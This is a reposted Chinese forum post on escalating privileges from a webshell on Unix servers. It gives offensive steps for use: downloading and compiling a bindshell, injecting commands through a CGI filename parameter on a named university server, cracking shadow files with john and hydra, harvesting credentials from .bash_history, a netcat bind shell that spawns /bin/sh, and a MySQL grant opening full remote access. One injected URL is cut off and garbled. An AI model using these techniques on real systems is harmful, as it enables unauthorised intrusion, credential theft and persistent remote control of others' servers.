• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    unix的webshell权限提升方法

    发布者: 土豆服务器 | 发布时间: 2025-6-27 15:27| 查看数: 62| 评论数: 0|帖子模式

    大部分技巧来源于我家学究天人的eong大大
    用wget把bindshell下载到/tmp/目录下
    或者再/etc/inetd.conf可写的情况下直接开一个交互的shell
    然后用gcc编译
    _num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|ls -al" rel=nofollow>http://cgiserver.sogang.ac.kr/~gsvi...ilename=rb9.txt|ls -al|
    ls -al显示文件

    ||中间的是显示的命令
    很简单的办法是得到用户

    1。我是说用hydra猜测密码,思路混乱的时候打成john跑shadow了。你可能有疑问,有了shell,为什么还要跑普通用户的密码(root经常是不能登陆的)。主要是为了查看.bash_history和其他资料,以及获取一个能够通过ssh/ftp/telnet 登陆的账号。也要考虑到proftpd_0day 之类的是需要一个能够正常登陆的账号的。没有这个webshell我也不会跑了,因为我连用户名(/etc/passwd)都不知道。.bash_history很可能已经包括了你所需要的user/pass.例如mysql的,还包括了管理员通常会访问的其他服务器。当然不是所有机器的访问限制都那么严格。/home对nobody来说也是经常可读的。可是我们必须考虑所有情况。
    2。如果你所知道的所有的vul都被补上了,面对所有的suid你都无能为力的时候。也许通过一个可以su -的账号你可以骗出root权限。
    3。对于我个人来说,用john跑shadow是为了完善我自己的密码/密码规则库。
    4。我从来没有把netcat和pipe 结合一起使用过,没有经验。也请你指教一下。
    To blackfox:
    搜索suid是有必要的,原因嘛。。不单纯是为了exploit一个suid程序,也反映了管理员的安全意识层次嘛。当然也许这年头还会有suidshell的存在。

    exec`nc -l -n -p 60000 -e /bin/sh`
    nc下载地址:http://www.leftworld.net/download/show?id=316.html

    mysql的ip禁止连接的打开方法:
    find / -name my.cnf -print
    mysql> grant all on *.* to username@IP identified by 'password';



    来源:https://www.jb51.net/hack/5251.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    浏览过的版块

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表